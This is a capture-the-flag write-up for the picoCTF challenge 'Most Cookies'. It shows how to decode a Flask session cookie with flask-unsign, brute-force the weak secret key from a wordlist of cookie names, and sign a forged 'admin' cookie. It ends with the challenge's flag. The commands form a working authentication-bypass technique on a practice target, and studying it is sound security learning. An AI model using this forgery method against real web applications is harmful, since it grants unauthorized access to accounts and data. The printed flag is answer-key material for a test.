Alright, enough of using my own encryption. Flask session cookies should be plenty secure! [server.py](https://mercury.picoctf.net/static/e99686c2e3e6cdd9e355f1d10c9d80d6/server.py) [http://mercury.picoctf.net:53700/](http://mercury.picoctf.net:53700/)

So let's check out the web page first to see what it has to offer.
Play around to see what the search button does, after a few tries, it looks like it takes a cookie name and converts it to a cookie for our web. 

Let's check out the source code. Look's like it's using flask session cookies, great.
```py
cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
```
So we have a list of cookies that we can use, but we're most interested in how we can get the flag, and this looks interesting.
```py
@app.route("/display", methods=["GET"])
def flag():
	if session.get("very_auth"):
		check = session["very_auth"]
		if check == "admin":
			resp = make_response(render_template("flag.html", value=flag_value, title=title))
			return resp
		flash("That is a cookie! Not very special though...", "success")
		return render_template("not-flag.html", title=title, cookie_name=session["very_auth"])
	else:
		resp = make_response(redirect("/"))
		session["very_auth"] = "blank"
		return resp
```
Okay let's decode the cookie first. With a bit of research I found about flask-unsign which is a very handy tool for dealing with cookies in flask, you can install it through pip.
Let's decode the cookie.
```bash
$flask-unsign --decode --cookie cookie.txt
{very_auth:snickerdoodle}
```
Okay so looking at the python function, it checks the 'very_auth' key, if it's not equal to admin it renders not-flag.html, but if it equals to admin, show us the flag.

You might be thinking, oh then we can just change very_auth to 'admin'. Well, that's not the case with these type of cookies, with flask cookies it needs to be signed with a **secret** otherwise it's invalid, so we need to know the secret first.

Let's try to find the secret key through the source.
```py
app.secret_key = random.choice(cookie_names)
```
Okay the secret key is a random choice of all those cookie names. So let's first make a wordlist of those cookie names.

Next, we need to somehow brute force it, luckily with flask-unsign, your job is only to give the input and a wordlist and you can sit back and relax.

For my reference, I'll be using hacktricks which is very useful.
```bash
$flask-unsign --unsign --cookie < cookie.txt --wordlist names.txt 
```
So we're passing in cookie.txt which contains the cookie and names.txt which is our list of names of cookies.

After a bit of waiting we get found the key, mine was 'peanut butter'
Now that we have the secret key, we can forge and sign our own cookies that will be verified by the web app.
```bash
$flask-unsign --sign --cookie "{'very_auth':'admin'}" --secret 'peanut butter'
```
Now just take the cookie and change and we'll be prompted with the flag.
```txt
picoCTF{pwn_4ll_th3_cook1E5_3646b931}
```